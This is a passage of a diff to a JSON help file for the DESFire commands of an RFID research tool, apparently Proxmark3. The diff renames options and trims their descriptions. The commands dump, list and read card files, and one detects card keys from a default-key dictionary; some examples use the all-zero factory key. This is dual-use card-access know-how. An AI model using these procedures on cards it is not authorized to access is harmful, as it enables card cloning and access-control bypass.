deletefile", "description": "delete file from application. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes deletefile --aid 123456 --fid 01 -> delete file for: app=123456, file=01 with defaults from `default` command", - "hf mfdes deletefile --appisoid df01 --fid 0f -s lrp -t aes -> delete file for lrp channel" + "hf mfdes deletefile --isoid df01 --fid 0f -s lrp -t aes -> delete file for lrp channel" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte)", "--no-auth execute without authentication" ], - "usage": "hf mfdes deletefile [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--no-auth]" + "usage": "hf mfdes deletefile [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--no-auth]" }, "hf mfdes detect": { "command": "hf mfdes detect", "description": "detect key type and tries to find one from the list.", "notes": [ "hf mfdes detect -> detect key 0 from picc level", - "hf mfdes detect -s d40 -> detect key 0 from picc level via secure channel d40", + "hf mfdes detect --schann d40 -> detect key 0 from picc level via secure channel d40", "hf mfdes detect --dict mfdes_default_keys -> detect key 0 from picc level with help of the standard dictionary", "hf mfdes detect --aid 123456 -n 2 --save -> detect key 2 from app 123456 and if succeed - save params to defaults (`default` command)", - "hf mfdes detect --appisoid df01 --save -> detect key 0 and save to defaults with card in the lrp mode" + "hf mfdes detect --isoid df01 --save -> detect key 0 and save to defaults with card in the lrp mode" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--dict file with keys dictionary", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", + "--dict dictionary file name with keys", "--save save found key and parameters to defaults" ], - "usage": "hf mfdes detect [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--dict ] [--save]" + "usage": "hf mfdes detect [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--dict ] [--save]" }, "hf mfdes dump": { "command": "hf mfdes dump", "description": "for each application show fil list and then file content. key needs to be provided for authentication or flag --no-auth set (depend on cards settings).", "notes": [ - "hf mfdes dump --aid 123456 -> show file dump for: app=123456 with channel defaults from `default` command/nhf mfdes dump --appisoid df01 -s lrp -t aes --length 000090 -> lrp default settings with length limit" + "hf mfdes dump --aid 123456 -> show file dump for: app=123456 with channel defaults from `default` command/nhf mfdes dump --isoid df01 -s lrp -t aes --length 000090 -> lrp default settings with length limit" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "-l, --length maximum length for read data files (3 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "-l, --length maximum length for read data files (3 hex bytes, big endian)", "--no-auth execute without authentication" ], - "usage": "hf mfdes dump [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [-l ] [--no-auth]" + "usage": "hf mfdes dump [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [-l ] [--no-auth]" }, "hf mfdes formatpicc": { "command": "hf mfdes formatpicc", @@ -4791,18 +4847,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of delegated application (3 hex bytes, big endian)" - ], - "usage": "hf mfdes formatpicc [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of delegated application (3 hex bytes, big endian)" + ], + "usage": "hf mfdes formatpicc [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ]" }, "hf mfdes freemem": { "command": "hf mfdes freemem", @@ -4814,146 +4870,146 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfreemem [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth]" + "usage": "hf mfdes getfreemem [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth]" }, "hf mfdes getaids": { "command": "hf mfdes getaids", "description": "get application ids list from card. master key needs to be provided or flag --no-auth set.", "notes": [ - "hf mfdes getaids -n 0 -t des -k 0000000000000000 -f none -> execute with default factory setup" + "hf mfdes getaids -n 0 -t des -k 0000000000000000 --kdf none -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication" ], - "usage": "hf mfdes getaids [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth]" + "usage": "hf mfdes getaids [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth]" }, "hf mfdes getappnames": { "command": "hf mfdes getappnames", "description": "get application ids, iso ids and df names from card. master key needs to be provided or flag --no-auth set.", "notes": [ - "hf mfdes getappnames -n 0 -t des -k 0000000000000000 -f none -> execute with default factory setup" + "hf mfdes getappnames -n 0 -t des -k 0000000000000000 --kdf none -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication" ], - "usage": "hf mfdes getappnames [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth]" + "usage": "hf mfdes getappnames [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth]" }, "hf mfdes getfileids": { "command": "hf mfdes getfileids", "description": "get file ids list from card. master key needs to be provided or flag --no-auth set.", "notes": [ "hf mfdes getfileids --aid 123456 -> execute with defaults from `default` command", - "hf mfdes getfileids -n 0 -t des -k 0000000000000000 -f none --aid 123456 -> execute with default factory setup" + "hf mfdes getfileids -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfileids [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--no-auth]" + "usage": "hf mfdes getfileids [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--no-auth]" }, "hf mfdes getfileisoids": { "command": "hf mfdes getfileisoids", "description": "get file ids list from card. master key needs to be provided or flag --no-auth set.", "notes": [ "hf mfdes getfileisoids --aid 123456 -> execute with defaults from `default` command", - "hf mfdes getfileisoids -n 0 -t des -k 0000000000000000 -f none --aid 123456 -> execute with default factory setup", - "hf mfdes getfileisoids --appisoid df01 -> get iso file ids from desfire light with factory card settings", - "hf mfdes getfileisoids --appisoid df01 -s lrp -t aes -> get iso file ids from desfire light via lrp channel with default key authentication" + "hf mfdes getfileisoids -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 -> execute with default factory setup", + "hf mfdes getfileisoids --isoid df01 -> get iso file ids from desfire light with factory card settings", + "hf mfdes getfileisoids --isoid df01 -s lrp -t aes -> get iso file ids from desfire light via lrp channel with default key authentication" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfileisoids [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--no-auth]" + "usage": "hf mfdes getfileisoids [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--no-auth]" }, "hf mfdes getfilesettings": { "command": "hf mfdes getfilesettings", "description": "get file settings from file from application. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes getfilesettings --aid 123456 --fid 01 -> execute with defaults from `default` command", - "hf mfdes getfilesettings --appisoid df01 --fid 00 --no-auth -> get file settings with select by iso id", - "hf mfdes getfilesettings -n 0 -t des -k 0000000000000000 -f none --aid 123456 --fid 01 -> execute with default factory setup" + "hf mfdes getfilesettings --isoid df01 --fid 00 --no-auth -> get file settings with select by iso id", + "hf mfdes getfilesettings -n 0 -t des -k 0000000000000000 --kdf none --aid 123456 --fid 01 -> execute with default factory setup" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--fid file id (1 hex byte). default: 1", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", + "--fid file id (1 hex byte). (def: 1)", "--no-auth execute without authentication" ], - "usage": "hf mfdes getfilesettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--fid ] [--no-auth]" + "usage": "hf mfdes getfilesettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--fid ] [--no-auth]" }, "hf mfdes getkeysettings": { "command": "hf mfdes getkeysettings", @@ -4966,18 +5022,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)" - ], - "usage": "hf mfdes getkeysettings [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)" + ], + "usage": "hf mfdes getkeysettings [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ]" }, "hf mfdes getkeyversions": { "command": "hf mfdes getkeyversions", @@ -4992,47 +5048,47 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number for authentication", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", - "--keynum key number/count (hex 1 byte). default 0x00.", - "--keyset keyset number (hex 1 byte)", + "-v, --verbose verbose mode", + "-n, --keyno key number for authentication", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian).", + "--keynum key number/count (1 hex byte). (def: 0x00)", + "--keyset keyset number (1 hex byte)", "--no-auth execute without authentication" ], - "usage": "hf mfdes getkeyversions [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--keynum ] [--keyset ] [--no-auth]" + "usage": "hf mfdes getkeyversions [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--keynum ] [--keyset ] [--no-auth]" }, "hf mfdes getuid": { "command": "hf mfdes getuid", "description": "get uid from card. get the real uid if the random uid bit is on and get the same uid as in anticollision if not. any card's key needs to be provided.", "notes": [ "hf mfdes getuid -> execute with default factory setup", - "hf mfdes getuid --appisoid df01 -t aes -s lrp -> for desfire lights default settings" + "hf mfdes getuid --isoid df01 -t aes -s lrp -> for desfire lights default settings" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian)." - ], - "usage": "hf mfdes getuid [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ]" + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)" + ], + "usage": "hf mfdes getuid [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ]" }, "hf mfdes help": { "command": "hf mfdes help", @@ -5072,51 +5128,51 @@ "description": "show application list. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ "hf mfdes lsapp -> show application list with defaults from `default` command", - "hf mfdes lsapp --files -> show application list and show each file type/settings/etc for each application" + "hf mfdes lsapp --files -> show application list and show each file type/settings/etc" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--no-auth execute without authentication", "--no-deep not to check authentication commands that avail for any application", - "--files scan files and print file settings for each application" + "--files scan files and print file settings" ], - "usage": "hf mfdes lsapp [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--no-auth] [--no-deep] [--files]" + "usage": "hf mfdes lsapp [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--no-auth] [--no-deep] [--files]" }, "hf mfdes lsfiles": { "command": "hf mfdes lsfiles", "description": "show file list. master key needs to be provided or flag --no-auth set (depend on cards settings).", "notes": [ - "hf mfdes lsfiles --aid 123456 -> show file list for: app=123456 with defaults from `default` commandhf mfdes lsfiles --appisoid df01 --no-auth -> show files from desfire light" + "hf mfdes lsfiles --aid 123456 -> show file list for: app=123456 with defaults from `default` commandhf mfdes lsfiles --isoid df01 --no-auth -> show files from desfire light" ], "offline": false, "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id (3 hex bytes, big endian)", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", "--no-auth execute without authentication" ], - "usage": "hf mfdes lsfiles [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--no-auth]" + "usage": "hf mfdes lsfiles [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--no-auth]" }, "hf mfdes mad": { "command": "hf mfdes mad", @@ -5133,19 +5189,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", - "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", - "--aid application id of issuer info file, (non-standard feature!) (3 hex bytes, big endian)", + "-v, --verbose verbose mode", + "-n, --keyno key number", + "-t, --algo crypt algo", + "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", + "--aid application id of issuer info file, (3 hex bytes, big endian), (non-standard feature!)", "--auth authenticate to get info from getapplicationids command (non-standard feature!)" ], - "usage": "hf mfdes mad [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--auth]" + "usage": "hf mfdes mad [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--auth]" }, "hf mfdes read": { "command": "hf mfdes read", @@ -5159,36 +5215,36 @@ "hf mfdes read --aid 123456 --fid 01 --type record --offset 000000 --length 000001 -> read one last record from record file. use default channel settings from `default` command", "hf mfdes read --aid 123456 --fid 10 --type data -c iso -> read file via iso channel: app=123456, short iso id=10, offset=0.", "hf mfdes read --aid 123456 --fileisoid 1000 --type data -c iso -> read file via iso channel: app=123456, iso id=1000, offset=0. select via native iso wrapper", - "hf mfdes read --appisoid 0102 --fileisoid 1000 --type data -c iso -> read file via iso channel: app iso id=0102, iso id=1000, offset=0. select via iso commands", - "hf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 -> get one record (number 5) from file 1100 via iso commands", - "hf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 -> get all record (from 5 to 1) from file 1100 via iso commands", - "hf mfdes read --appisoid df01 --fid 00 -s lrp -t aes --length 000010 -> read via lrp channel", - "hf mfdes read --appisoid df01 --fid 00 -s ev2 -t aes --length 000010 --isochain -> read desfire light via ev2 channel" + "hf mfdes read --isoid 0102 --fileisoid 1000 --type data -c iso -> read file via iso channel: app iso id=0102, iso id=1000, offset=0. select via iso commands", + "hf mfdes read --isoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 -> get one record (number 5) from file 1100 via iso commands", + "hf mfdes read --isoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 -> get all record 